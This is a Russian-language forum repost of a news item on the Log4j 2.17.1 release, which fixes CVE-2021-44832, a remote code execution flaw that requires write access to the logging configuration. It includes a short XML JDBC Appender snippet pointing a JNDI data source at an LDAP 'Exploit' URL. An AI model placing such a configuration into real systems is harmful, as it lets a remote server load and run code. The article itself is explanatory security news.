Обновление Log4j 2.17.1 с устранением ещё одной уязвимости
Автор
Сообщение
news_bot ®
Стаж: 6 лет 2 месяца
Сообщений: 27286
Опубликованы корректирующие выпуски библиотеки Log4j 2.17.1, 2.3.2-rc1 и 2.12.4-rc1, в которых устранена ещё одна уязвимость (CVE-2021-44832). Упоминается, что проблема позволяет организовать удалённое выполнение кода (RCE), но при этом помечена как неопасная (CVSS Score 6.6) и в основном представляет лишь теоретический интерес, так как требует специфичных условий для эксплуатации - атакующий должен иметь возможность внести изменение в файл с настройками Log4j, т.е. должен иметь доступ к атакуемой системе и полномочия изменять значение параметра конфигурации log4j2.configurationFile или вносить изменения в существующие файлы c настройками для ведения лога.
Атака сводится к определению на локальной системе конфигурации на базе JDBC Appender, ссылающейся на внешний JNDI URI, при запросе которого может быть возвращён Java-класс для исполнения. По умолчанию JDBC Appender не настроен для обработки протоколов, отличных от Java, т.е. без изменения конфигурации атака невозможна. Кроме того, проблема проявляется только в JAR-файле log4j-core и не затрагивает приложения, использующие JAR-файл log4j-api без log4j-core.
<Appenders>
<JDBC name="databaseAppender" tableName="dbo.application_log">
<DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>
...
</JDBC>
</Appenders>
===========
Источник:
OpenNet.RU
===========
Похожие новости
- Главная ссылка к новости (https://www.openwall.com/lists...)
- OpenNews: Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8% Maven-пакетов
- OpenNews: Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту
- OpenNews: 17 проектов Apache оказались затронуты уязвимостью в Log4j 2
- OpenNews: Критическая уязвимость в Apache Log4j 2, затрагивающая многие Java-проекты
Похожие новости:
- Ещё одна уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8% Maven-пакетов
- Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту
- 17 проектов Apache оказались затронуты уязвимостью в Log4j 2
- Катастрофическая уязвимость в Apache Log4j, затрагивающая многие Java-проекты
- Доступен Emscripten 3.0, компилятор из C/C++ в WebAssembly
- Web-фреймворк Pusa, переносящий логику JavaScript-фронтэнда на сторону сервера
- Применение невидимых unicode-символов для скрытия действий в JavaScript-коде
- Выпуск JavaScript-платформы Deno 1.16
- Выпуск серверной JavaScript-платформы Node.js 17.0
- Выпуск Brython 3.10, реализации языка Python для web-браузеров
Теги для поиска: #_log4j, #_java
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 03-Май 06:23
Часовой пояс: UTC + 5
| Автор | Сообщение |
|---|---|
|
news_bot ®
Стаж: 6 лет 2 месяца |
|
|
Опубликованы корректирующие выпуски библиотеки Log4j 2.17.1, 2.3.2-rc1 и 2.12.4-rc1, в которых устранена ещё одна уязвимость (CVE-2021-44832). Упоминается, что проблема позволяет организовать удалённое выполнение кода (RCE), но при этом помечена как неопасная (CVSS Score 6.6) и в основном представляет лишь теоретический интерес, так как требует специфичных условий для эксплуатации - атакующий должен иметь возможность внести изменение в файл с настройками Log4j, т.е. должен иметь доступ к атакуемой системе и полномочия изменять значение параметра конфигурации log4j2.configurationFile или вносить изменения в существующие файлы c настройками для ведения лога. Атака сводится к определению на локальной системе конфигурации на базе JDBC Appender, ссылающейся на внешний JNDI URI, при запросе которого может быть возвращён Java-класс для исполнения. По умолчанию JDBC Appender не настроен для обработки протоколов, отличных от Java, т.е. без изменения конфигурации атака невозможна. Кроме того, проблема проявляется только в JAR-файле log4j-core и не затрагивает приложения, использующие JAR-файл log4j-api без log4j-core. <Appenders>
<JDBC name="databaseAppender" tableName="dbo.application_log"> <DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/> ... </JDBC> </Appenders> =========== Источник: OpenNet.RU =========== Похожие новости
|
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 03-Май 06:23
Часовой пояс: UTC + 5